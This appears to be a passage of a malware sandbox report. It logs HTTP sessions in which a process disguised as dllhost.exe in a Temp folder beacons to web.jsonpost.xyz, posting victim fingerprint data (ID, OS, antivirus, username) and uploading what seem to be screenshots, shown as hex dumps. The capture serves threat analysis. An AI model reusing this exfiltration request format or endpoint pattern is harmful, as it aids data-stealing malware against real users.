                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                59192.168.2.44979572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:47.264528036 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                60192.168.2.44979672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:47.643878937 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:47.643923044 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:47.643990040 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:47.644011021 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:47.764269114 CET7416OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:47.764309883 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:47.764358997 CET2472OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:47.764388084 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:47.764496088 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:47.764511108 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:52:47.884488106 CET2472OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                61192.168.2.44979772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:48.733674049 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                62192.168.2.44979872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:49.076442003 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:49.076653004 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:49.076750994 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:49.076837063 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:49.196789980 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:49.196819067 CET2472OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:49.196870089 CET4944OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:52:49.197035074 CET4944OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:52:49.197094917 CET2472OUTData Raw: a9 ad 4c 96 b1 bc 45 ca 4c 57 6a 85 f3 bc cc e1 97 39 40 00 24 82 d8 19 ce b2 d4 6c af 26 37 57 37 e2 04 be d4 1e ca cc 25 82 a6 e6 5d b9 2e 88 e0 22 82 ea 38 dc 4f 27 15 10 b5 be 48 ad 51 66 b5 66 b3 31 fd 9a 79 2d 62 69 a2 f2 db 72 01 21 42 d8
                                                                                Data Ascii: LELWj9@$l&7W7%]."8O'HQff1y-bir!Bp82MCJg9,<AY8~{ejZkL!Ie693"DT`x Y6]P%]P#3)pw;'sd+,BOyXr_U#:#q
                                                                                Nov 29, 2024 01:52:49.197143078 CET3708OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:49.197242975 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                63192.168.2.44979972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:50.401408911 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                64192.168.2.44980072.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:50.885485888 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----1ecb6449b11250019f89ed10f8ec15d7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98005
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:50.885580063 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 31 65 63 62 36 34 34 39 62 31 31 32 35 30 30 31 39 66 38 39 65 64 31 30 66 38 65 63 31 35 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------1ecb6449b11250019f89ed10f8ec15d7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:50.885669947 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:50.885693073 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:51.005781889 CET2472OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:51.005880117 CET4944OUTData Raw: fa 13 57 d0 70 a5 49 47 1d c8 9e 8d 3b 9f 3d c4 f4 e3 2c 17 33 dd 34 73 54 51 45 7e 90 7e 7c 14 51 45 00 15 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 e7 b5 e8 5f 0b bf e4 5f d4 3f ec 23 27 fe 82 95 f3 f9 ef fc ba f5 7f 91 f5 fc 2d fc 3c 4f a4 7f
                                                                                Data Ascii: WpIG;=,34sTQE~~|QE__?#'__?#'-<O15_F+4VSNg9=m[HET#r5{CN%Oor/"y{F3K u%y{&3am#vsWFbkbU)#OH46I(
                                                                                Nov 29, 2024 01:52:51.005975008 CET4944OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:52:51.006074905 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:52:51.006237984 CET6180OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:52:51.126429081 CET2472OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:52:51.126463890 CET2472OUTData Raw: 48 d2 29 c1 21 77 6d 0b 90 70 0a 93 8e f9 e6 b6 2e a3 8e 2d 6a f2 d6 de e6 d1 d5 75 28 ec 44 29 33 b3 40 d2 13 e5 ef 24 63 9c 1e 85 b1 d0 e0 f1 59 17 d0 de dd d8 cf 6f 25 95 93 dc 4c 81 1e f7 e7 59 1c 0e ec 03 6c 2d 8e 37 6d cf 7c e7 9a ae 6d b5
                                                                                Data Ascii: H)!wmp.-ju(D)3@$cYo%LYl-7m|m\]jj2ob|w,r:9qqqk=WsyfOknl%G7"($rFml1\\C#32Ac]ic8bmlen(`($I


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                65192.168.2.44980172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:51.484558105 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                66192.168.2.44980272.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:52:52.339449883 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----0c493e27f64201eb17b9a0de8f16fea0
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98257
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:52:52.339513063 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 30 63 34 39 33 65 32 37 66 36 34 32 30 31 65 62 31 37 62 39 61 30 64 65 38 66 31 36 66 65 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------0c493e27f64201eb17b9a0de8f16fea0Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:52:52.339584112 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:52:52.339601040 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:52:52.459805965 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:52:52.460139990 CET9888OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
